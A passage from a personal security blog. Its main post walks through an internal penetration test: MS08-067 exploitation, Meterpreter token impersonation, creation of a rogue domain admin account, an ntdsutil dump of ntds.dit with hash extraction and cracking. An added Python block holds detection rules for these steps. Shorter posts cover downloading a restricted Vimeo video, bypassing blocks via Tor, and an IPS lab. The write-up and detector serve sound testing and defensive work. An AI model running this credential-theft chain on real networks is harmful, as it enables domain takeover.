Friday, October 24, 2014


This post is about an internal vulnerability assessment and penetration test for an enterprise. Every time I do a similar project I think of writing a post about it for my own reference... At last, now is the time.
Yes.. more than 1500 users...
More than 100 servers...
Routers...

My favourite fingerprinting command for a Windows environment:
nmap -p445 --script=smb-os-discovery

Ran Nessus against the desktop IP range. Surprisingly, all of them came back clean, except for RDP MITM, SSL and SMB signing findings!

Continued Nessus on the server ranges at headquarters: same result!!

Continued Nessus on the servers at the branch offices...

Except for one Windows 2003 server, all the others showed the same!!!

There comes the last fingerprint: what is that critical red entry? Yes, it is the very old, widely exploited and demonstrated bug in evergreen Microsoft: MS08-067!

No more explanation required here at all. Yes, there comes the first reverse Meterpreter shell!

meterpreter > use incognito
Loading extension incognito...success.

meterpreter > list_tokens -u

Delegation Tokens Available

Impersonation Tokens Available

meterpreter > impersonate_token DOMAIN\\backupuser
[-] No delegation token available
[+] Successfully impersonated user
meterpreter > getuid
Server username:
meterpreter > execute -f cmd.exe -i -t
Process 3712 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.


There comes a user from the domain. Next, created a user on the domain.

C:\WINDOWS\system32>net user pentest password-not-now /add /domain
net user pentest password-not-now /add /domain
The request will be processed at a domain controller for domain DOMAIN.

Luckily the backupuser account had the privilege to create a user on the ADC and add it to the Domain Admins group, etc.

Connected to the Primary Domain Controller with RDP!!
At the command prompt:
C:\> ntdsutil
ntdsutil: snapshot
snapshot: activate instance NTDS
Active instance set to "NTDS".
snapshot: list all
No snapshots found.
snapshot: create
Creating snapshot...
Snapshot set {xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} generated successfully.
snapshot: list all
2: C:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
snapshot: mount 2
Snapshot {xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} mounted as C:\$SNAP_xxxxxxxxxxxxxxxxxxxxxx_VOLUMEC$\

Downloaded the ntds.dit file from

Created a copy of the SYSTEM hive from the registry:
reg.exe save HKLM\SYSTEM c:\pentest.system
Downloaded that file too..

Files downloaded from PDC
167M    ntds.dit
8.9M     pentest.system

Used the following options for extracting usernames and hashes (the tool name did not survive in the post; these flags are the syntax of Impacket's secretsdump.py):
-system pentest.system -ntds ntds.dit LOCAL

The resulting file had more than 3000 lines!!!
The CrackStation password list was able to get up to 50 passwords for half of the hashes, and 20% of the users were using the same password!
***Cracking hashes is not allowed in all organizations, so before cracking any passwords make sure that this action is not prohibited by their policy.***
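As an added defender's counterpart to the chain above (not part of the original post), this Python snippet runs a few detection rules over constructed Windows Security events: a command line that creates a domain user, a freshly created account being added to Domain Admins, ntdsutil snapshot use, and a reg save of the SYSTEM hive. The hostnames, the event field layout and the sample records are assumptions; the event IDs (4688 process creation, 4720 user created, 4728 member added to a global group) are the real Windows ones.

```python
import re

# Constructed sample records, not real logs: (event_id, host, subject_user, detail).
# 4688 = process creation (detail is the command line), 4720 = user account created,
# 4728 = member added to a security-enabled global group such as Domain Admins.
SAMPLE_EVENTS = [
    (4688, "BRANCH-2003", "DOMAIN\\backupuser", r"C:\WINDOWS\system32\cmd.exe"),
    (4688, "BRANCH-2003", "DOMAIN\\backupuser", "net user pentest * /add /domain"),
    (4720, "PDC01", "DOMAIN\\backupuser", "TargetUserName=DOMAIN\\pentest"),
    (4728, "PDC01", "DOMAIN\\backupuser",
     "TargetUserName=Domain Admins;MemberName=DOMAIN\\pentest"),
    (4688, "PDC01", "DOMAIN\\pentest", 'ntdsutil snapshot "activate instance ntds" create quit quit'),
    (4688, "PDC01", "DOMAIN\\pentest", r"reg.exe save HKLM\SYSTEM c:\pentest.system"),
    (4688, "WS-042", "DOMAIN\\alice", r"C:\Program Files\Microsoft Office\WINWORD.EXE"),
]

# Command-line patterns for the steps the post walks through.
COMMAND_RULES = {
    "domain_user_created_from_cmd": re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b.*\s/domain\b", re.I),
    "ntds_snapshot": re.compile(r"\bntdsutil\b.*\b(snapshot|ifm)\b", re.I),
    "system_hive_export": re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\SYSTEM\b", re.I),
}

def _fields(detail):
    """Parse 'Key=Value;Key=Value' details into a dict (assumed field layout)."""
    return dict(part.split("=", 1) for part in detail.split(";") if "=" in part)

def detect(events):
    """Return (finding, host, user) triples for suspicious records.

    Process-creation records are matched against COMMAND_RULES; 4720/4728 records
    are correlated so that an account created inside the log window and then put
    into Domain Admins is flagged, which is exactly the escalation in the post."""
    findings = []
    newly_created = set()
    for event_id, host, user, detail in events:
        if event_id == 4688:
            for name, pattern in COMMAND_RULES.items():
                if pattern.search(detail):
                    findings.append((name, host, user))
        elif event_id == 4720:
            newly_created.add(_fields(detail).get("TargetUserName"))
        elif event_id == 4728:
            f = _fields(detail)
            if f.get("TargetUserName") == "Domain Admins" and f.get("MemberName") in newly_created:
                findings.append(("new_account_made_domain_admin", host, f["MemberName"]))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print("%-32s host=%s user=%s" % finding)
```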

Thursday, October 2, 2014


I came across a situation where I had a valid Vimeo video link, but Vimeo would not allow it to be viewed online!

The rest is explained below in pictures..

First, when I tried to access it in the browser, it did not work!

Then I pasted the link in

I was easily able to download the video :D

**Contents hidden due to privacy issues ...

How did I get the links?

It was from a website. I just saved the page source and ran the following command on Linux to get the Vimeo links:

#grep vimeo vimeo.txt  | awk -F"src=" '{print $2}' | awk -F "\" frame" '{print $1}' | awk -F "\"" '{print $2}'

Tuesday, September 30, 2014


Just a snapshot of downloading blocked content [blocked by organization/ISP/government/country/etc.] on Kali via the Tor network.

Blocked Contents
Tails Linux

Monday, September 29, 2014

IBM Security Network Protection

IBM Security Network Protection (IPS/IDS)

Downloaded the following from the IBM site:

1. VMware image of the IBM Security Network Protection (XGS) Virtual Appliance for demo.
2. 30-day license for all features, functionality and updates.
3. Demo Setup Guide for ISNP (XGS) Virtual Appliance.

VM settings for IBM Security Network Protection

The custom interface /dev/vmnet4 is crucial in this configuration, as it works in bridged sniffing mode.

VM settings for DVWA (live CD)

DVWA is accessed through the IPS/IDS bridge.

Sample application access monitoring and blocked URL.

Event log entry created

URLs accessed and the file-access IPS entry:-